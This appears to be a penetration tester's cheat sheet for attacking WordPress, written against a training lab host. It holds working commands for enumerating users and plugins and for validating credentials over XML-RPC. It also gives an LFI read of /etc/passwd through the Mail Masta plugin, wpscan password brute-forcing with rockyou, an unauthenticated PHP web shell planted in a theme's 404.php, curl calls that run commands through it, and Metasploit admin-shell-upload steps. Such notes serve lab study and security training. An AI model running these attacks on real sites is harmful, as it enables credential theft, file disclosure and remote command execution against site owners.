WordPress enumeration and exploitation notes
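# Discover the WordPress core version: the generator meta tag in the page
# head is the most direct source (the ?ver= query string on wp-includes
# assets often leaks it as well).
curl -s -X GET http://blog.inlanefreight.com | grep '<meta name="generator"'
# Enumerate installed plugins from asset paths referenced in the HTML.
# (This lists plugins, not the core version; the grep matches the literal
# path prefix, and sort -u collapses repeated references.)
curl -s -X GET http://blog.inlanefreight.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/' | cut -d"'" -f2 | sort -u
# Same for themes.
curl -s -X GET http://blog.inlanefreight.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/themes/' | cut -d"'" -f2 | sort -u
# Enumerate users via author-ID redirection: a valid ID answers with a
# redirect whose Location header ends in /author/<username>/. Walk
# ?author=1,2,3... and read the Location header of each response.
curl -s -I -X GET http://blog.inlanefreight.com/?author=1
# Second method: the REST API user listing (may be empty or denied on a
# hardened site, so treat an empty result as inconclusive).
curl -s http://blog.inlanefreight.com/wp-json/wp/v2/users | jq
# Validate credentials over XML-RPC. Correct credentials return the user's
# blog list; wrong ones return faultCode 403 "Incorrect username or password".
curl -s -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>" http://blog.inlanefreight.com/xmlrpc.php
# List every method xmlrpc.php exposes (the original notes used a different
# lab target here, hence the hard-coded IP:port). wc -l only counts lines;
# the second form prints the method names themselves.
curl -i -s -k -X $'POST' -H $'Host: 138.68.163.76:32302' --data-binary $'<methodCall>\x0d\x0a<methodName>system.listMethods</methodName>\x0d\x0a<params></params>\x0d\x0a</methodCall>\x0d\x0a\x0d\x0a' 'http://138.68.163.76:32302/xmlrpc.php' | wc -l
curl -s -k -X POST -H 'Host: 138.68.163.76:32302' --data-binary '<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>' 'http://138.68.163.76:32302/xmlrpc.php' | grep -o '<string>[^<]*</string>'
# wpscan enumeration. Do not paste the API token into notes or shell
# history: keep it in wpscan's config file (~/.wpscan/scan.yml) or an
# environment variable and reference it from there.
wpscan --url http://blog.inlanefreight.com --enumerate --api-token "$WPSCAN_API_TOKEN"
# LFI in the Mail Masta plugin: the pl parameter is treated as a file path,
# so any file readable by the web-server user can be fetched. Once the web
# root is known, wp-config.php (database credentials) is the obvious next read.
curl http://blog.inlanefreight.com:32302/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
# Password attack against xmlrpc.php. The original note had "-U admin, david"
# (a space after the comma makes "david" a stray positional argument) and no
# --url, which wpscan requires; user lists are comma-separated with no spaces.
wpscan --url http://blog.inlanefreight.com --password-attack xmlrpc -t 20 -U admin,david -P passwords.txt
# Brute-force a single user with rockyou against a non-standard port.
wpscan --url http://blog.inlanefreight.com:30594 --password-attack xmlrpc -t 20 -U roger -P /usr/share/wordlists/rockyou.txt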
// Edit 404.php of the Twenty Seventeen theme (Appearance -> Theme Editor,
// which needs an administrator account and is unavailable if wp-config.php
// sets DISALLOW_FILE_EDIT). The active theme is Transportex, so pick an
// unused theme such as Twenty Seventeen instead of modifying the live one.
// Choose the theme, click Select, then open a non-critical file such as
// 404.php and append the web shell below.
<?php
// Minimal web shell appended to an inactive theme's 404.php: the value of
// the `cmd` GET parameter is handed to the system shell and its output is
// echoed back. There is no authentication, so anyone who can reach the
// URL can run commands as the web-server user -- drop it only on an
// authorised engagement and remove it when finished.
$command = $_GET['cmd'];
system($command);
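# RCE through the 404.php of the (inactive) twentyseventeen theme: files
# under wp-content/themes/ are served directly, so the edited template is
# reachable without going through the active theme.
curl -X GET "http://<target>/wp-content/themes/twentyseventeen/404.php?cmd=id"
# Read the flag. -G with --data-urlencode makes curl URL-encode the command
# (spaces, quotes, pipes) instead of hand-writing %20 sequences.
curl -s -G --data-urlencode 'cmd=cat /home/wp-user/flag.txt' "http://blog.inlanefreight.com:30594/wp-content/themes/twentyseventeen/404.php"
# Restore the original 404.php (or remove the shell) once done: it is
# unauthenticated and usable by anyone who finds it.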
// MSF: search wp_admin -> exploit/unix/webapp/wp_admin_shell_upload
// (needs valid admin credentials; it uploads a malicious plugin through the
// admin panel to obtain a session, so confirm the plugin is gone afterwards).
// use exploit/unix/webapp/wp_admin_shell_upload   (full path rather than "use 0": search ordering is not stable)
// set rhosts blog.inlanefreight.com
// set rport <port>        (the lab exposes WordPress on non-standard ports, e.g. 30594)
// set username admin
// set password ...
// set lhost x.x.x.x
// run
// Vulnerable plugin identified by wpscan:
// Email Subscribers & Newsletters < 4.2.3 - Multiple Issues
https://wpscan.com/vulnerability/a0764617-6142-4ef7-94f9-1fb923e81e94